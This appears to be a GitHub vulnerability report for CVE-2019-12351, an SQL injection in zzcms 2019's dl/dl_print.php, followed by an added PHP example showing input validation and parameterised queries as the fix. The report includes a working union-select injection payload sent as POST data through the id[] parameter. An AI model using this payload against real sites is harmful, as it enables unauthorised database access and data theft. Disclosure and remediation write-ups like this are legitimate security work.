CVE-2019-12351: zzcms 2019 dl/dl_print.php SQL injection · Issue #3 · cby234/zzcms
An issue was discovered in zzcms 2019. SQL Injection exists in dl/dl_print.php via an id parameter value with a trailing comma.
Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS 2018 upgraded to 2019 (2019-01-11)
0x01 Vulnerability (/dl/dl_print.php, lines 76-80)
If the index of the ',' character in the id parameter is greater than 0, the SQL will be
When we check the query, there is no single quote around the id parameter, so we can inject
any query through the id parameter.
There is no security filter on the id parameter, so an SQL query can be injected through it
by appending ',' to the end of the id value.
0x02 payload
Send the "POC" value below as the POST data to "/dl/dl_print.php":
POC : union SQL injection menu1=%3Fb%3D123%26province%3D%26city%3D%26keyword%3D%26page_size%3D2&FileExt=xls&sql=select+count%28*%29+as+total+from+zzcms_dl+where+classid%3D1+&chkAll=checkbox&id%5B%5D=1) union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,version(),0,1,2,3-- a,
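As an added defensive illustration (this is not zzcms code; lines 76-80 of dl_print.php are not reproduced in the report, so the shape of the original query is an assumption): the payload implies that the id[] array is joined with commas into an IN (...) list without quoting or integer casting. The hardened version below validates every element as a digit string and binds each one as a PDO parameter; the table name zzcms_dl is taken from the payload, and the PDO connection $pdo is assumed.

```php
<?php
// Added example, not zzcms code. Assumes an existing PDO connection in $pdo
// and the table zzcms_dl named in the report's payload.

/**
 * Normalise the id[] request parameter to a list of non-negative integers.
 * Anything else (an empty trailing element, "1) union select ...", a signed
 * or hexadecimal value) is rejected before it can reach the SQL text.
 */
function parseIdList($raw): array
{
    if (!is_array($raw)) {
        $raw = [$raw];
    }
    $ids = [];
    foreach ($raw as $v) {
        // ctype_digit accepts only non-empty strings of "0"-"9"
        if (!is_string($v) || !ctype_digit($v)) {
            throw new InvalidArgumentException('id must contain only integers');
        }
        $ids[] = (int) $v;
    }
    return array_values(array_unique($ids));
}

function fetchDlRows(PDO $pdo, array $ids): array
{
    if ($ids === []) {
        return [];
    }
    // One placeholder per id: the driver binds each value separately, so no
    // request-controlled character is ever concatenated into the statement.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $pdo->prepare("SELECT * FROM zzcms_dl WHERE id IN ($placeholders)");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Assumed vulnerable pattern, for contrast only:
//   $sql = "select * from zzcms_dl where id in (" . implode(',', $_POST['id']) . ")";
// Here the request value is pasted verbatim into the IN list, which is why the
// report's id[] value with a closing parenthesis and trailing comma works.

try {
    $rows = fetchDlRows($pdo, parseIdList($_POST['id'] ?? []));
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('bad request');
}
```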